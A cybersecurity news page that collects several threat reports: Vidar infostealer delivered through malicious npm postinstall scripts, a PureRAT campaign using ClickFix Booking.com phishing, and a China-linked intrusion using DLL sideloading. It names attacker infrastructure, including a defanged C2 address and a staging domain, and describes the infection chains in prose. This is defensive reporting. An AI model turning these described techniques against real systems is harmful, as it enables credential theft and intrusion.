German hosting provider aurologic GmbH has emerged as a critical hub within the global malicious infrastructure ecosystem, according to recent intelligence reporting. The Langen-based ISP, which operates AS30823, serves as a primary upstream provider to multiple threat activity enablers (TAEs) and sanctioned entities, establishing itself as a central nexus connecting some of the internet’s most […]
A new ransomware group, Cephalus, has emerged in the cybersecurity threat landscape, targeting organizations through compromised Remote Desktop Protocol (RDP) accounts. First detected in mid-June 2025, this group represents a growing threat to businesses that have not implemented proper security measures on their remote access systems. How Cephalus Operates The Cephalus ransomware group employs a […]
ClickFix attacks have surged dramatically over the past year, cementing their position as pivotal tools in the modern attacker’s arsenal. These sophisticated social engineering campaigns coerce users into executing malicious code on their own devices, bypassing traditional awareness defenses that focus on preventing suspicious clicks, dodgy downloads, and phishing websites. During a recent threat briefing […]
A sophisticated supply-chain attack has emerged targeting Windows systems through compromised npm packages, marking a critical vulnerability in open-source software distribution.
Between October 21 and 26, 2025, threat actors published 17 malicious npm packages containing 23 releases designed to deliver Vidar infostealer malware.
The campaign exploited the trust developers place in package registries, leveraging legitimate-appearing packages that masqueraded as Telegram bot helpers, icon libraries, and forks of popular projects including Cursor and React.
The attack leveraged two recently created npm accounts, aartje and saliii229911, which published packages downloaded over 2,240 times before removal from the registry.
This distribution method represents a paradigm shift for Vidar, historically spread through phishing emails with malicious Office documents.
The deceptive packaging and seemingly legitimate functionality allowed the malicious code to propagate widely before detection.
Package custom-tg-bot-plan presents like a legitimate SDK on its npm page (Source – DATADOG Security Labs)
Datadog Security Labs security researchers identified the campaign through their GuardDog static analyzer, which flagged suspicious indicators including postinstall script execution and process spawning operations.
The discovery revealed that all packages executed identical attack chains through postinstall scripts, with some variants using PowerShell commands embedded directly in package.json files.
Infection Mechanism and Technical Breakdown
The attack demonstrates remarkable simplicity in execution. When developers installed compromised packages, postinstall scripts automatically triggered, downloading an encrypted ZIP archive from bullethost.cloud infrastructure.
The downloader scripts used hardcoded credentials to extract the archive, retrieving bridle.exe, a Go-compiled Vidar variant previously unseen in npm distributions.
The malware then executed with system privileges, initiating the information theft process.
This Vidar variant collects sensitive data including browser credentials, cookies, cryptocurrency wallets, and system files before exfiltrating stolen information through command-and-control infrastructure.
The malware discovers active C2 servers by querying hardcoded Telegram and Steam throwaway accounts containing regularly updated C2 domains.
After successful data exfiltration, the malware deletes traces of itself, complicating post-compromise detection.
The campaign represents a sophisticated understanding of npm ecosystem vulnerabilities.
Threat actors rotated between multiple C2 domains and implemented variations in postinstall script implementations, likely to evade pattern-based detection systems.
All affected packages remained live on npm for approximately two weeks, establishing this as one of the most consequential npm-based malware campaigns targeting enterprise development environments and individual developers worldwide.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
A new threat has surfaced in the mobile banking landscape Herodotus, a sophisticated Android banking Trojan that has been wreaking havoc in recent weeks. Offered under the notorious Malware-as-a-Service (MaaS) model, Herodotus leverages social engineering and technical deception, evading detection by conventional antivirus solutions and putting users’ financial data at serious risk. Herodotus addressed victims […]
A sophisticated phishing campaign is actively targeting hotel establishments and their guests through compromised Booking.com accounts, according to research uncovered by security experts.
The campaign, dubbed “I Paid Twice” due to evidence of victims paying twice for their reservations, has been operating since at least April 2025 and remains active as of October 2025.
The attack scheme combines credential theft with multi-stage malware deployment, creating a complex threat targeting the global hospitality sector.
The operation begins when threat actors compromise hotel administrator systems through spearphishing emails that impersonate legitimate Booking.com communications.
Booking.com phishing pages (Source – Sekoia)
These emails contain carefully crafted messages referencing guest reservations and booking platform activities, lending them credibility to unsuspecting recipients.
The emails include malicious URLs that redirect victims through a sophisticated redirection infrastructure before deploying the ClickFix social engineering tactic.
Once victims execute the downloaded commands, malware infects their systems, granting attackers access to professional credentials for booking platforms like Booking.com and Expedia.
The broader criminal ecosystem supporting this operation reveals an alarming level of professionalization within cybercrime communities.
Threat actors harvest hotel administrator credentials and sell them through Russian-speaking cybercrime forums and marketplaces.
High-value compromised Booking.com accounts managing multiple properties in developed nations command prices between $5 and $5,000 depending on activity levels and reservation volumes.
This commodification of stolen credentials has created a self-sustaining fraud pipeline where specialized services handle each phase of the attack chain.
Sekoia security researchers identified the malware family PureRAT at the core of this infection chain.
Once deployed through the ClickFix redirection mechanism, PureRAT executes PowerShell commands that gather system information and download additional payload files.
The malware establishes persistence through Windows registry modifications and implements a sophisticated loader mechanism using DLL side-loading techniques.
Technical Breakdown of the Infection Mechanism
The attack initiates when victims receive phishing emails from compromised hotel accounts. Malicious URLs redirect through randomized domains following the pattern hxxps://{randomname}[.]com/[a-z0-9]{4}.
These domains employ sophisticated JavaScript that checks iframe contexts before redirecting users to ClickFix pages.
Infection chain (Source – Sekoia)
The redirection infrastructure serves as a commercialized Traffic Distribution System (TDS), concealing the attacker’s primary infrastructure from detection and takedown efforts.
Each redirection step carefully preserves URL patterns containing keywords like “admin” and “extranet” to maintain perceived legitimacy during the social engineering phase.
When users land on ClickFix pages, they encounter Booking.com brand elements alongside a reCAPTCHA interface prompting them to copy commands.
The copied command contains Base64-encoded PowerShell instructions that execute without user awareness.
This initial PowerShell command downloads secondary scripts from staging URLs ending in /bomla, which orchestrates the infection progression.
The loader gathers comprehensive system information including machine name, current user, Windows version, and installed antivirus products before downloading a ZIP archive containing executable and dynamic link library files.
Persistence mechanisms employ multiple techniques to ensure malware survives system restarts. The installation process creates Run registry keys under CurrentVersion\Run that execute PowerShell commands loading the extracted binary.
Additionally, shortcut files (.lnk) are placed in the Windows Startup directory to trigger execution during boot sequences.
The malware reports status updates at each infection stage through Command and Control servers, confirming successful progression.
The .exe binary triggers DLL side-loading using AddInProcess32.exe, a legitimate Windows component designed to host COM add-ins.
This technique allows PureRAT to execute entirely in memory without writing files to disk, significantly complicating detection efforts and enabling fileless malware execution that bypasses traditional signature-based security tools.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The Congressional Budget Office (CBO), which serves as Congress’s official financial advisor, has been targeted in a suspected cyberattack by suspected foreign actors. The breach exposed sensitive financial research data that lawmakers rely on to make crucial budgeting decisions and craft legislation affecting millions of Americans. The CBO confirmed the attack through an official agency […]
LockBit has remained one of the most dominant ransomware-as-a-service (RaaS) groups in the world since its emergence as ABCD ransomware in 2019 and official launch as LockBit in 2020. Despite high-profile setbacks including international law enforcement takedowns in early 2024 and a damaging affiliate panel leak in May 2025 the group continues to update its […]
A set of nine malicious NuGet packages has been identified as capable of dropping time-delayed payloads to sabotage database operations and corrupt industrial control systems.
According to software supply chain security company Socket, the packages were published in 2023 and 2024 by a user named “shanhai666” and are designed to run malicious code after specific trigger dates in August 2027 and
China-linked threat actors have intensified their focus on influencing American governmental decision-making processes by targeting organizations involved in shaping international policy.
In April 2025, a sophisticated intrusion into a U.S. non-profit organization revealed the persistent efforts of these attackers to establish long-term network access and gather intelligence related to policy matters.
The threat actors demonstrated considerable technical sophistication, employing multiple evasion techniques and exploiting various vulnerabilities to maintain control over the compromised infrastructure for several weeks.
The attack campaign reflects a broader pattern of Chinese state-sponsored espionage targeting policy-influencing institutions.
Initial reconnaissance began on April 5, 2025, when attackers conducted mass vulnerability scans against organizational servers, attempting exploits including CVE-2022-26134 (Atlassian OGNL Injection), CVE-2021-44228 (Log4j), CVE-2017-9805 (Apache Struts), and CVE-2017-17562 (GoAhead RCE).
These scanning activities established the foundation for their subsequent exploitation attempts and network compromise.
Symantec security analysts identified multiple tactical indicators linking this campaign to established Chinese threat groups including Space Pirates, Kelp (Salt Typhoon), and Earth Longzhi, a recognized subgroup of the long-standing APT41 collective.
The forensic evidence pointed directly to China-based attribution through several distinctive attack methodologies.
DLL Sideloading as Primary Persistence Mechanism
The attackers deployed DLL sideloading as their primary persistence mechanism, leveraging a legitimate VipreAV component named vetysafe.exe to execute malicious payload sbamres.dll.
This technique exploits Windows’ dynamic library search order by planting malicious code that legitimate applications automatically load and execute.
The attackers created a scheduled task running every 60 minutes with SYSTEM privileges, executing msbuild.exe to load an unknown XML configuration file containing injected code.
This code subsequently established communication with a command-and-control server at hxxp://38.180.83[.]166/6CDF0FC26CDF0FC2.
The sophisticated approach allowed attackers to maintain persistent access while evading traditional security detection mechanisms, demonstrating evolving capabilities in targeting U.S. policy institutions.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
.webp)
.webp)
.webp)